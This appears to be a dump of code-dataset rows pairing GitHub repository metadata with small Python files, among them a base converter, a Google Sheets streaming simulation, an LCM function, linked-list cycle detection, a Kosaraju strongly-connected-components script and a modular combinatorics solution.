    """Return the roles mapping loaded via config_file_manager.

    The underlying data lives in ./configuration/roles/main.yml.
    """
    # load roles from ./configuration/roles/main.yml
    return config_file_manager.get_roles_config()
# def parse_roles(roles):
# for role, playbooks in roles.iteritems():
# print "Applying role" + role + " since only one found!"
# for playbook in playbooks:
# # apply playbook
# print playbook
# print config_file_manager.get_playbook(playbook)
def get_role_playbooks(role_name):
    """Return the loaded playbooks configured for *role_name*, or [].

    BUG FIX: the original body referenced an undefined global `roles` and an
    undefined local `playbook`, so every call raised NameError.  Roles are
    now fetched via get_roles(), and each playbook listed for the role is
    loaded through config_file_manager.
    """
    roles = get_roles()
    if role_name in roles:
        # Load every playbook configured for this role.
        return [config_file_manager.get_playbook(playbook)
                for playbook in roles[role_name]]
    # Unknown role: keep the (previously commented-out) intent of
    # returning an empty result rather than raising.
    return []
# Smoke entry point: load the roles when run directly (result is discarded).
if __name__ == '__main__':
    get_roles()
| [
"dkoudlo@gmail.com"
] | dkoudlo@gmail.com |
4f0f16b99a79f80182147aa4bf200e1caaa008c5 | e27c906d8321a7da1086a9e4cfd9ec102a456fd1 | /Python/qn1.py | 6ff08b3571b6904d9935bf7bfb7cd210e3230635 | [] | no_license | bhavykhatri/Computing-Laboratory | aa47ff2ccbc9565a373f7e3ee9ae659c1f5d6729 | 5f405dc9778bc42ba8ef3c6288a7f34e905e5ded | refs/heads/master | 2020-03-14T01:07:24.538762 | 2018-04-28T04:24:18 | 2018-04-28T04:24:18 | 131,370,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,167 | py | #!usr/bin/python
# Python 2 script: read a number string (INPUT1) and a base (INPUT2, valid
# range 2..36) and print its decimal value, or "INVALID INPUT" on any
# out-of-range base, bad digit, or malformed number.
invalid=1
k=1
m=0
n=0
INPUT1 = raw_input("")
INPUT2 = float(input(""))
# Base must lie strictly between 1 and 37 (i.e. 2..36).
if 1<INPUT2<37:
	invalid=1
else:
	invalid=0
# k becomes 0 when the number contains a decimal point.
for i in range(len(INPUT1)):
	if INPUT1[i]=='.':
		k=0
if k==0:
	# Split into integer part (Ichild) and fractional part (Fchild);
	# more than one '.' makes the input invalid.
	devider_int_frac = str(INPUT1).split('.')
	Fchild = devider_int_frac[1]
	Ichild = devider_int_frac[0]
	if len(devider_int_frac) > 2:
		invalid=0
else:
	Ichild = INPUT1
	Fchild=str(0)
a=0
solution = 0
minus=1
# Strip a leading minus sign; minus==0 records a negative number.
if Ichild[0]=='-':
	Ichild=Ichild[1:]
	minus=0
# Reverse the integer part so index n equals the digit's power of the base.
Ichild=Ichild[::-1]
# Accumulate the fractional digits: digit * base**-(position+1).
# Digits '0'-'9' map to 0-9; 'A'-'Z' map to 10-35, capped by the base.
while m < len(Fchild):
	if min(58,INPUT2+48)>ord(Fchild[m])>47:
		a = ord(Fchild[m])-48
	elif min(91,INPUT2+55)>ord(Fchild[m])>64:
		a = ord(Fchild[m])-55
	else:
		invalid=0
		break
	solution += a*INPUT2**(-m-1)
	m=m+1
# Accumulate the integer digits: digit * base**position.
while n < len(Ichild):
	if min(58,INPUT2+48)>ord(Ichild[n])>47:
		a = ord(Ichild[n])-48
	elif min(91,INPUT2+55)>ord(Ichild[n])>64:
		a = ord(Ichild[n])-55
	else:
		invalid=0
		break
	solution += a*INPUT2**(n)
	n=n+1
if invalid==1 :
	if minus==0 :
		print -1*solution
	else:
		print solution
else:
	print "INVALID INPUT"
| [
"bhavy@bhavy-HPbhavy@iitk.ac.in"
] | bhavy@bhavy-HPbhavy@iitk.ac.in |
d70479004635a01cf70e35ec5944a4c2a46c61b7 | ec68fde704c7562a0291f608b9638b9f0b8fd0f9 | /Stream Processing | Air Quality Control/Simulate.py | 1ccccc24ef15eeb09b4092c07aa0c4aed9d0f87b | [] | no_license | albedero/albedero.github.io | 112be540f5f4281493aab55e64977e0c02e2bf06 | d8610d601c2ff4c60bd4479af29960faee80db85 | refs/heads/main | 2023-04-21T20:21:54.721602 | 2021-05-06T15:13:20 | 2021-05-06T15:13:20 | 302,104,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | from pyspark import SparkConf,SparkContext # from pyspark.conf import SparkConf
from pyspark.streaming import StreamingContext
from pyspark.sql import Row,SQLContext
import sys
#import kafka
import requests
from pyspark.streaming.kafka import KafkaUtils # ERROR
import json
import pandas as pd
import gspread
from gspread_dataframe import set_with_dataframe
from google.oauth2 import service_account
import re
import operator
import random
import time
# Simulation driver: stream a CSV into a Google Sheet in 9-row batches with
# a random 1-2.5s pause between batches (simulating live sensor data).
new_csv = pd.read_csv("group_simulation.csv")
gc = gspread.service_account(filename='tweets-97ab5693ec9b.json') # Google API credentials
sh = gc.open_by_key('1dId7bMBrMCJsFGdIGuAL8Mzhpd7mCRgmnBg86eOYg54') # your_google_sheet_ID
sheet_index_no = 0
worksheet = sh.get_worksheet(sheet_index_no)
# Clear any data left over from a previous run before streaming.
range_of_cells = worksheet.range('A2:E1000') #-> Select the range you want to clear
for cell in range_of_cells:
    cell.value = ''
worksheet.update_cells(range_of_cells)
# NOTE(review): each iteration rewrites starting at row 2, so every batch
# overwrites the previous one rather than appending -- confirm intended.
for i in range(len(new_csv)):
    i2 = i*9+9
    print(new_csv.iloc[i*9:i2,:])
    set_with_dataframe(worksheet, new_csv.iloc[i*9:i2,:],row=2,include_column_header=False)
    time_value = random.uniform(1, 2.5)
    time.sleep(time_value)
| [
"noreply@github.com"
] | albedero.noreply@github.com |
393b04eb61b8b508a881983558631823f16dde28 | 8c5aa45df2598f8d0fd5553f7e0f1c5a1b8f81e9 | /PythonFiles/Unrelated Math/Volume13_4.py | 3c101fa1a864f5dc753024ab5235a87f495619e1 | [] | no_license | maxsolberg/CUAutomation | c08b6c2bb8a921e83ce7ff7fc0fec52a54089018 | 863c6ec796f279719ac558684955636bfe73d1d0 | refs/heads/master | 2021-05-02T13:50:27.068507 | 2018-05-20T19:51:33 | 2018-05-20T19:51:33 | 120,707,981 | 2 | 0 | null | 2018-02-08T04:33:34 | 2018-02-08T03:53:43 | null | UTF-8 | Python | false | false | 585 | py | # Volume via cross-products and determinants
# Created by Max Solberg
# Reads three 3-D vectors u, v, w and prints the scalar triple product
# u . (v x w), i.e. the determinant of the matrix [u; v; w].
a= float(input("X-component of vector u: "))
b= float(input("Y-component of vector u: "))
c= float(input("Z-component of vector u: "))
d= float(input("X-component of vector v: "))
e= float(input("Y-component of vector v: "))
f= float(input("Z-component of vector v: "))
g= float(input("X-component of vector w: "))
h= float(input("Y-component of vector w: "))
i= float(input("Z-component of vector w: "))
# Cofactor expansion of the 3x3 determinant along the first row.
# NOTE(review): this is the SIGNED volume; abs() is usually expected for a
# parallelepiped volume -- confirm intended.
j= (a*(e*i-f*h)+b*(f*g-d*i)+c*(d*h-e*g))
Volume= (str(j))
Answer= "The volume is " + Volume
print(Answer)
| [
"mrs372@cornell.edu"
] | mrs372@cornell.edu |
f8e6ec44ec47235fe1560d765b5b9f15f9ce3d81 | 158a725465bd079710a7ad12e6ab45b9f49cc273 | /lowestCommonNum.py | ba33f1aee473d968098c4d53a02f3e6eefdf406a | [] | no_license | AutoTestingGroup/PythonExample | 177a2db11732b7a633962fea90cf245627554926 | 3a2a804e4f8cdd9021d9dea2de52b6f7b423492a | refs/heads/master | 2020-05-21T03:00:07.945241 | 2019-05-16T10:47:49 | 2019-05-16T10:47:49 | 185,890,238 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 539 | py | # -*- coding: utf-8 -*-
# Filename lowestCommonNum.py Python 最小公倍数算法
# 定义函数
def lcm(x, y):
    """Return the least common multiple of two positive integers.

    Replaces the original brute-force search (which tried every candidate
    from max(x, y) upward -- O(lcm) iterations, and shadowed the function
    name with a local variable) with the identity
    lcm(x, y) = x * y // gcd(x, y), computed in O(log min(x, y)).
    """
    from math import gcd  # local import: this file has no import section
    return x * y // gcd(x, y)
# Read the two numbers from the user (the prompt strings are in Chinese:
# "enter the first/second number").
num1 = int(input("输入第一个数字: "))
num2 = int(input("输入第二个数字: "))
# Prints: "<num1> and <num2> have least common multiple <lcm>".
print(num1, "和", num2, "的最小公倍数为", lcm(num1, num2))
"legend919@163.com"
] | legend919@163.com |
807bd4413ac24f6180b70539c7ef6c6621b7e9db | 372185cd159c37d436a2f2518d47b641c5ea6fa4 | /142. 环形链表 II.py | 83c889995bd0403eefdbd90103e6fe0fd1b3b7b1 | [] | no_license | lidongze6/leetcode- | 12022d1a5ecdb669d57274f1db152882f3053839 | 6135067193dbafc89e46c8588702d367489733bf | refs/heads/master | 2021-07-16T09:07:14.256430 | 2021-04-09T11:54:52 | 2021-04-09T11:54:52 | 245,404,304 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | class ListNode:
    def __init__(self, x):
        """Create a singly linked list node holding value x, with no successor."""
        self.val = x
        self.next = None
class Solution:
def detectCycle(self, head: ListNode) -> ListNode:
if head == None or head.next == None:
return None
fast = slow = head
temp = False # 记录是否有环
while fast.next and fast.next.next:
slow = slow.next
fast = fast.next.next
if fast == slow:
temp = True
break
if temp == True: # 若有环,则计算环起点位置
fast = head
while slow != fast:
slow = slow.next
fast = fast.next
return slow
return None # 若temp False 则无环,返回空
| [
"lidongze6@163.com"
] | lidongze6@163.com |
352380d8b64625551ab36200eabe6efe7099a2f5 | b9bac659cd8aa6c8eb60039c36bd0fd169099fe9 | /stronglyconnectedcomponents.py | 425ebcce124dd963f5a03d6c9ad5b1da15c25221 | [] | no_license | sAksham-Ar/Algorithms | 8e14e51ba07c8d9828f0cae2153bab3222316848 | 063e882ed56478aaec0d86e1b50b2f4be877e68c | refs/heads/master | 2023-01-24T04:51:48.973957 | 2020-12-04T13:01:47 | 2020-12-04T13:01:47 | 271,748,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,292 | py | # Copyright David Bai: Anyone can use this code without permission or referencing the original source
"""
W1 Kosaraju Algorithm
List Based Iterative Implementation to find sizes of strongly connected components
"""
########################################################
# Data Structures
# node labels range from 1 to 875714. 875715 was used because of the range operator... range(875715) goes up to 875714.
num_nodes = 1000001
# Adjacency representations of the graph and reverse graph
gr = [[] for i in range(2*num_nodes)]
r_gr = [[] for i in range(2*num_nodes)]
# The list index represents the node. If node i is unvisited then visited[i] == False and vice versa
visited = [0] *(2* num_nodes)
# The list below holds info about sccs. The index is the scc leader and the value is the size of the scc.
scc = [0] *(2* num_nodes)
leader = [0] *(2* num_nodes+1)
stack = [] # Stack for DFS
order = [] # The finishing orders after the first pass
########################################################
# Importing the graphs
file = open("2sat6.txt", "r") # I named the input file W1_SCC_edges.txt, but you can name it whatever you wish
data = file.readlines()
i=0
for line in data:
if i!=0:
items = line.split()
gr[-int(items[0])+num_nodes] += [int(items[1])+num_nodes]
gr[-int(items[1])+num_nodes] += [int(items[0])+num_nodes]
r_gr[int(items[0])+num_nodes] += [-int(items[1])+num_nodes]
r_gr[int(items[1])+num_nodes] += [-int(items[0])+num_nodes]
i=i+1
########################################################
# DFS on reverse graph
f=1
for node in range(2*num_nodes):
if visited[node]==False:
stack.append(node)
while stack:
stack_node=stack.pop()
if visited[stack_node]!=2:
stack.append(stack_node)
if visited[stack_node]==0:
visited[stack_node]=1
order.append(stack_node)
f=1
for head in r_gr[stack_node]:
if visited[head]==0:
f=0
visited[head]=1
stack.append(head)
if f==1:
visited[stack_node]=2
order.append(stack_node)
stack.pop()
########################################################
# DFS on original graph
visited = [0] * len(visited) # Resetting the visited variable
order.reverse() # The nodes should be visited in reverse finishing times
for node in order:
if visited[node]==0:
visited[node]=1
scc[node]=scc[node]+1
leader[node]=node
stack.append(node)
while stack:
stack_node=stack.pop()
for head in gr[stack_node]:
if visited[head]==0:
visited[head]=1
scc[node]=scc[node]+1
leader[head]=node
stack.append(head)
########################################################
# Getting the five biggest sccs
f=0
for i in range(num_nodes):
if leader[i]==leader[2*num_nodes-i] and scc[leader[i]]!=1:
f=1
break
if f==1:
print("nah")
scc.sort(reverse=True)
print(scc[:5]) | [
"noreply@github.com"
] | sAksham-Ar.noreply@github.com |
d8e84ed478a875c489750a51825632d3d1309f59 | 98383e62e61321f65450bb0fd901215ccbe6293b | /hanlp/components/coref/__init__.py | 83097d68d94078f4c9e9298921041daa3ced94cd | [
"Apache-2.0",
"CC-BY-NC-4.0",
"Python-2.0",
"CC-BY-NC-SA-4.0"
] | permissive | leobert-lan/HanLP | 155a66b5c93720abeb816616cb3b9ef4f7942e83 | 39c3ede99c3f99d7ea39bbbd470601dc7ef0ad62 | refs/heads/master | 2021-06-16T17:51:54.485767 | 2021-03-26T02:36:12 | 2021-03-26T02:36:12 | 178,836,942 | 1 | 0 | Apache-2.0 | 2021-03-26T02:36:13 | 2019-04-01T10:09:21 | Java | UTF-8 | Python | false | false | 64 | py | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2020-07-05 19:56 | [
"jfservice@126.com"
] | jfservice@126.com |
32fe88969c29acd42125c481d6f2bd756033c283 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02685/s529348276.py | 65a166ca77210af61f1ce19dd156965d2e9ccf58 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | mod=998244353
# Counting colorings modulo 998244353 (competitive-programming task):
# n blocks, m colors, at most k adjacent equal pairs allowed.
fact=[1]
for i in range(1,2*10**5+1): # factorials modulo `mod`
    fact.append((fact[-1]*i)%mod)
revfact=[1]
for i in range(1,2*10**5+1): # inverse factorials via Fermat's little theorem
    revfact.append(pow(fact[i],mod-2,mod))
n,m,k=map(int,input().split())
ans=0
# For each allowed number of equal adjacent pairs i (0..k), the blocks form
# `group` = n - i maximal runs: choose the run boundaries C(n-1, group-1),
# color the first run (m ways) and each later run differently (m-1 ways).
for i in range(k,-1,-1):
    group=n-i
    tmp=fact[n-1]*revfact[group-1]*revfact[n-1-(group-1)]
    tmp%=mod
    tmp*=m
    tmp%=mod
    tmp*=pow(m-1,group-1,mod)
    ans+=tmp
    ans%=mod
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.